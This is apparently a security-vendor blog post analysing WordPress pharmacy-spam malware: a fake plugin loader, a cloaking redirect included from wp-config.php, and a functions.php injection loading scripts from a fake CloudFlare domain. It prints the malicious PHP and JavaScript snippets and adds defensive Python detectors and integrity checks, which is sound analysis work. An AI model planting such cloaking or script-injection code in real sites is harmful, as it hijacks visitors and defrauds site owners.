FBCMS Pharmacy Spam Website

Whenever most people think of a website CMS, they most often think of the popular options like WordPress, Joomla, or Drupal. What do all three of those CMS platforms have in common along with most common CMS platforms? They use a programming language like PHP in conjunction with a database that is used to store the user-generated data. Now, in most cases that I have seen throughout the years, it is rare for a hacker to deploy one of these CMS platforms on a compromised website and use it for malicious purposes. It is usually just easier for the hacker to upload a few .zip files containing their doorway spam tools, then unzip them and move onto a new target. The content of these .zip files is usually a large directory containing a few scripts and a lot of SEO spam content that will be used to divert traffic or boost keywords. Another popular technique used by these SEO spammers is to inject existing website files and push new keywords “on-the-fly” from a remote server to the compromised websites hosting the injected files—more on that method here.

I mention this because I came across a pharmacy spam directory on a compromised website that was constructed using the Bootstrap CSS framework, along with various PHP engine files that serve the pharmacy content based on a visitor’s geolocation. Once it is loaded, it looks like a generic CMS or Bootstrap designed website except it is dedicated entirely to pharmacy spam:

Easily deployed, customisable pharmacy spam website

A bizarrely named file ./wp-content/mu-plugins/0-sucuri-boot.php is used to begin loading the malicious pharmacy spam content. It contains similar header comments to our Sucuri plugin to add some fake authenticity. However, the file itself just loads the pharmacy website that was located in the directory wp-content/gforms/:
0-sucuri-boot.php: We do not use a file with such a name in our WordPress plugin

While it is unknown how the pharmacy spam website was created (it looks like someone spent some time on the overall template, as it has many features built into it), the configuration file is located at ./cfg/config.victimdomain.php. This file defines the target country (in this case, the United States) and many other settings that control what is ultimately displayed to the visitor:

Overall, this pharmacy spam website uses over 750 files since it cannot depend upon a database to store the many pharmacy products it is advertising. It’s important to note that no actual sales occur through this pharmacy spam website that is placed onto compromised websites. Instead it redirects the visitor once they finally are ready to order:

Conditional redirection to an online pharmacy store

During an investigation, a client reported some weird behavior: all incoming visits that came from clicking one of their Google search results were instantly redirected to an online pharmacy store.

This occurred with visits that were initiated by clicking on any of their indexed search results at Google.com.

The malware caused all incoming visits from Google.com searches to be automatically redirected to hxxxs://pharm-bay(.) com.

After further investigation, the hacker simply hid the malicious code in an extensionless file called “log” in their tmp folder.

The malicious file was then loaded by ./wp-config.php, which had been modified to include() that log file.

Here is the conditional redirection rule snippet from the tmp/log file (reformatted for readability; the original is a single line):

...
if ($content = $client->getContent()) {
    // Crawlers (User-Agent containing "google" or "bot") are served the remote doorway content
    if ((strpos($_SERVER['HTTP_USER_AGENT'], 'google') !== false) || (strpos($_SERVER['HTTP_USER_AGENT'], 'bot') !== false)) {
        echo $content;
        die;
    // Visitors arriving from Google or Bing on any URL other than "/" get the redirect script
    } elseif ((strpos($_SERVER['HTTP_REFERER'], 'google') !== false) || (strpos($_SERVER['HTTP_REFERER'], 'bing') !== false)) {
        if ($_SERVER['REQUEST_URI'] != '/') {
?><script src="hxxp://scipton(.)com/doorways/default/script/script4.js"></script><?php
            die;
        }
    }
}
...

As you can see, the malicious code first checks whether the visitor looks like a search engine crawler (the User-Agent contains "google" or "bot") and, if so, serves the doorway content fetched from the remote server. Otherwise it checks whether the referrer is set to Google or Bing, and if the request is for any page other than the homepage, it serves the malicious JavaScript that redirects the visitor to the hxxxs://pharm-bay(.)com pharmacy store. Direct visitors and the site owner, who rarely arrive via a search result, see the normal site, which is why this kind of cloaking is easy to miss.
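The decision logic above, reimplemented in Python as an added example (this is not the malware's own code): classify_request() mirrors the three branches of the injected PHP, and run_probes() shows how to reproduce the cloaking from the outside by requesting the same URL with a crawler User-Agent, a search-engine Referer, and plain headers, then comparing the bodies. The responder, the probe header sets and the page bodies are constructed for the example; in practice responder would be a real HTTP fetch.

```python
# Added example: reimplementation of the cloaking branches from the injected
# PHP snippet above, plus a differential probe to detect it. Not the malware's code.

SPAM_CONTENT = "spam_content"        # crawler branch: echo $content; die
REDIRECT_SCRIPT = "redirect_script"  # search-visitor branch: external <script>; die
NORMAL = "normal"                    # no branch taken: site renders as usual


def classify_request(headers, request_uri, remote_content_ok=True):
    """Return which branch of the injected code a request would hit.

    Matching is case-sensitive substring search, exactly like PHP strpos().
    remote_content_ok models the outer if($content = $client->getContent()):
    when the remote doorway server is down, no cloaking happens at all.
    """
    if not remote_content_ok:
        return NORMAL
    ua = headers.get("User-Agent", "")
    referer = headers.get("Referer", "")
    if "google" in ua or "bot" in ua:
        return SPAM_CONTENT
    if ("google" in referer or "bing" in referer) and request_uri != "/":
        return REDIRECT_SCRIPT
    return NORMAL


# Constructed probe header sets (assumption: these three views are enough
# to expose this particular cloaker; other families key on IP or cookies too).
PROBES = {
    "crawler": {
        "User-Agent": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    },
    "search_visitor": {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/52.0",
        "Referer": "https://www.google.com/",
    },
    "direct_visitor": {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/52.0",
    },
}


def run_probes(request_uri, responder):
    """Fetch request_uri once per probe; responder(headers, uri) -> body text."""
    return {name: responder(headers, request_uri) for name, headers in PROBES.items()}


def cloaking_detected(results):
    """Cloaking is indicated when the same URL yields different bodies per probe."""
    return len(set(results.values())) > 1


def simulated_responder(headers, request_uri):
    """Constructed stand-in for an infected site, driven by classify_request()."""
    branch = classify_request(headers, request_uri)
    return {
        SPAM_CONTENT: "<html>cheap pills doorway</html>",
        REDIRECT_SCRIPT: '<script src="hxxp://scipton(.)com/doorways/default/script/script4.js"></script>',
        NORMAL: "<html>legitimate page</html>",
    }[branch]


if __name__ == "__main__":
    for uri in ("/", "/blog/some-post/"):
        res = run_probes(uri, simulated_responder)
        print(uri, "cloaked" if cloaking_detected(res) else "consistent", res)
```

Probing only the homepage would miss the redirect branch, since the injected code skips it when REQUEST_URI is "/"; probe a deep URL that Google actually indexes.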

Let us know if you see or suspect any weird behavior on your website and we will be happy to investigate and clean it for you.

WebSockets, Viagra and Fake CloudFlare CDN

Recently we’ve seen some WordPress websites displaying unwanted banners at the bottom of the page which appear 15 seconds after browsing the website. Those banners are being generated due to the following code being injected into the theme’s functions.php file:

function add_js_scripts() {
    wp_enqueue_script('js-rws', 'hXXp://cloudflare[.]solutions/ajax/libs/reconnecting-websocket/1[.]0[.]0/reconnecting-websocket[.]js', '', null, true);
    wp_enqueue_script('js-cors', 'hXXp://cloudflare[.]solutions/ajax/libs/cors/cors[.]js', '', null, true);
}

add_action( 'wp_enqueue_scripts', 'add_js_scripts' );
add_action('admin_enqueue_scripts', 'add_js_scripts' );
add_action('login_enqueue_scripts', 'add_js_scripts' );

The code above uses WordPress core functions like wp_enqueue_script and add_action to inject external scripts into all WordPress pages (including admin and login pages).
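A static check for the two injection patterns described on this page, the wp-config.php include() of an extensionless tmp file and the theme functions.php enqueue of scripts from an unexpected host, written as an added example (not Sucuri's scanner). The sample PHP inputs are constructed here to resemble the injected code; the allowlist of CDN hosts and the treatment of ABSPATH-based includes as normal are assumptions you would tune for your own site.

```python
# Added example: grep-style indicator scan for the enqueue and include patterns
# discussed above. Not the page's own tooling; the samples below are constructed.
import re
from urllib.parse import urlparse

# Constructed sample modelled on the injected functions.php shown above.
SAMPLE_FUNCTIONS_PHP = r"""<?php
function add_js_scripts() {
    wp_enqueue_script('js-rws', 'http://cloudflare.solutions/ajax/libs/reconnecting-websocket/1.0.0/reconnecting-websocket.js', '', null, true);
    wp_enqueue_script('theme-main', get_template_directory_uri() . '/js/main.js', array('jquery'), '1.0', true);
    wp_enqueue_style('fa', 'https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css');
}
add_action('wp_enqueue_scripts', 'add_js_scripts');
add_action('login_enqueue_scripts', 'add_js_scripts');
"""

# Constructed sample modelled on the modified wp-config.php from the redirect case.
SAMPLE_WP_CONFIG = r"""<?php
define('DB_NAME', 'wp');
include('/home/victim/tmp/log');
require_once(ABSPATH . 'wp-settings.php');
"""

# Assumption: hosts your theme is actually expected to load assets from.
ALLOWED_HOSTS = {"cdnjs.cloudflare.com", "ajax.googleapis.com", "fonts.googleapis.com"}

# Only literal-URL sources are matched; computed sources (get_template_directory_uri() ...)
# are left for manual review.
ENQUEUE_RE = re.compile(r"wp_enqueue_(script|style)\s*\(\s*'([^']*)'\s*,\s*'([^']*)'")
INCLUDE_RE = re.compile(r"\b(include|require)(_once)?\s*\(?\s*([^;]+?)\s*\)?\s*;")
SENSITIVE_HOOKS = ("admin_enqueue_scripts", "login_enqueue_scripts")


def find_external_enqueues(php, allowed=ALLOWED_HOSTS):
    """Return (kind, handle, host) for every enqueue whose host is not allowlisted."""
    findings = []
    for kind, handle, src in ENQUEUE_RE.findall(php):
        host = urlparse(src).hostname
        if host and host not in allowed:
            findings.append((kind, handle, host))
    return findings


def find_suspicious_includes(php):
    """Return (function, path) for literal includes of non-.php files or tmp paths."""
    findings = []
    for func, once, arg in INCLUDE_RE.findall(php):
        literal = re.fullmatch(r"\s*'([^']+)'\s*", arg)
        if not literal:
            continue  # ABSPATH . '...' style includes are normal in wp-config.php
        path = literal.group(1)
        if not path.endswith(".php") or "/tmp/" in path:
            findings.append((func + once, path))
    return findings


def hooked_to_sensitive_contexts(php):
    """Which admin/login enqueue hooks the file registers; themes rarely need these."""
    return [h for h in SENSITIVE_HOOKS if re.search(r"add_action\s*\(\s*'%s'" % h, php)]


if __name__ == "__main__":
    print(find_external_enqueues(SAMPLE_FUNCTIONS_PHP))
    print(hooked_to_sensitive_contexts(SAMPLE_FUNCTIONS_PHP))
    print(find_suspicious_includes(SAMPLE_WP_CONFIG))
```

Run it over every functions.php and wp-config.php on the host; a theme enqueuing assets into admin and login pages from a host you did not choose is the combination this campaign relies on.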

The third-party scripts load from what looks like a CloudFlare CDN. And if you open the cloudflare[.]solutions site, you’ll see it says "This Server is part of Cloudflare Distribution Network." However, WHOIS says that the domain had been registered only on February 11, 2017 to a Russian company, Legato LLC, and it is now hosted in Ukraine on a server with IP 78.109.28.70.

The first injected script reconnecting-websocket.js is a copy of a legitimate ReconnectingWebSocket library. It’s not malicious. But the second injected script cors.js is more interesting. After decoding it, you may notice that it has a list of banner images saved on imgur.com image hosting.

var banners=[];
var bannercount=0;
var bannersSrc=["hXXPs://i.imgur[.]com/gXcct1z[.]jpg","hXXPs://i.imgur[.]com/FAdidSx.jpg","hXXPs://i.imgur[.]com/fGOvfDF.jpg","hXXPs://i.imgur[.]com/MjWLkNB.jpg","hXXPs://i.imgur[.]com/3On9O6O.jpg","hXXPs://i.imgur[.]com/cdBEiDU.jpg","hXXPs://i.imgur[.]com/xyKxCFG.jpg","hXXPs://i.imgur[.]com/BRSxZ96.jpg","hXXPs://i.imgur[.]com/NfyV72o.jpg","hXXPs://i.imgur[.]com/fcHTBav.jpg","hXXPs://i.imgur[.]com/5SsJqTM.jpg"];
var mobileBanners=["hXXPs://i.imgur[.]com/KRqvxk4.jpg","hXXPs://i.imgur[.]com/84mQCt4.jpg","hXXPs://i.imgur[.]com/hyblTs8[.]jpg","hXXPs://i.imgur[.]com/85tjX88.jpg"];

The script downloads the images, then waits for 15 seconds and loads them as banners that lead you to www[.]orderrealviagra[.]cc, rotating the images on every new page load. If a user clicks on the banner, or closes it (the banners have a close [x] button), the script sets an adwords-cookie-settings cookie valid for the next 7 days and won’t show the banners to browsers that present this cookie.

An interesting and quite rare feature of this script is that it uses the WebSocket protocol (that’s why they also inject the reconnecting-websocket.js library) instead of HTTP to communicate with its server at wss://cloudflare[.]solutions:8085, using a custom set of commands, each followed by the visitor’s User-Agent string:

socket.send("cb*" + navigator.userAgent)
socket.send("rts*" + navigator.userAgent)
socket.send("rsbl*" + navigator.userAgent)
socket.send("msbl*" + navigator.userAgent)

Using new generic TLDs like .solutions is still quite uncommon. But not on this server. A reverse IP lookup revealed only one other site on this server (ardf[.]world), which also happens to use a new generic TLD (.world). Do these sites have the same owner or is it just a coincidence?

This case proves that malware may hide behind legit-looking URLs and you should carefully review all third-party resources that your site loads. Don’t forget that theme files are a very popular target for malware injections (the most popular for attacks that use stolen/bruteforced WordPress credentials) and you should monitor their integrity. Unauthorized changes are a strong indicator of a hack.
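One way to do the integrity monitoring recommended above, as an added example (not Sucuri's monitoring product): build a SHA-256 manifest of the WordPress tree while it is known clean, then diff later manifests against it. The demo() function constructs a throwaway tree and replays the two changes seen on this page, an appended theme functions.php and a dropped mu-plugins/0-sucuri-boot.php, so the diff can be checked offline; the file contents and paths in demo() are constructed for the example.

```python
# Added example: file-integrity baseline and diff for a WordPress install.
# Not the page's tooling; demo() builds a constructed tree to exercise it.
import hashlib
import tempfile
from pathlib import Path


def build_manifest(root):
    """Map each file's path (relative, POSIX-style) to its SHA-256 hex digest."""
    root = Path(root)
    manifest = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            rel = path.relative_to(root).as_posix()
            manifest[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return manifest


def diff_manifests(baseline, current):
    """Classify every path as added, removed or modified relative to the baseline."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline.keys() & current.keys()
                      if baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def demo():
    """Constructed scenario: clean theme, then the injections described on this page."""
    with tempfile.TemporaryDirectory() as tmp:
        theme = Path(tmp) / "wp-content" / "themes" / "sample"
        theme.mkdir(parents=True)
        (theme / "functions.php").write_text("<?php // clean theme\n")
        (theme / "style.css").write_text("/* theme */\n")
        baseline = build_manifest(tmp)

        # Attacker appends an enqueue hook to the theme (modified file)...
        with open(theme / "functions.php", "a") as f:
            f.write("add_action('wp_enqueue_scripts', 'add_js_scripts');\n")
        # ...and drops a must-use plugin with a plausible-looking name (added file).
        mu = Path(tmp) / "wp-content" / "mu-plugins"
        mu.mkdir()
        (mu / "0-sucuri-boot.php").write_text("<?php // dropper\n")

        return diff_manifests(baseline, build_manifest(tmp))


if __name__ == "__main__":
    print(demo())
```

Store the baseline off-host (an attacker with write access to the document root can rewrite a manifest kept beside it) and regenerate it only after you have deliberately updated WordPress, themes or plugins, so that a modified functions.php or a new file under mu-plugins stands out as an unauthorized change.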

If you see your site showing unwanted banners or popups but can’t locate their source, you might want to have us scan your site for malware and clean it.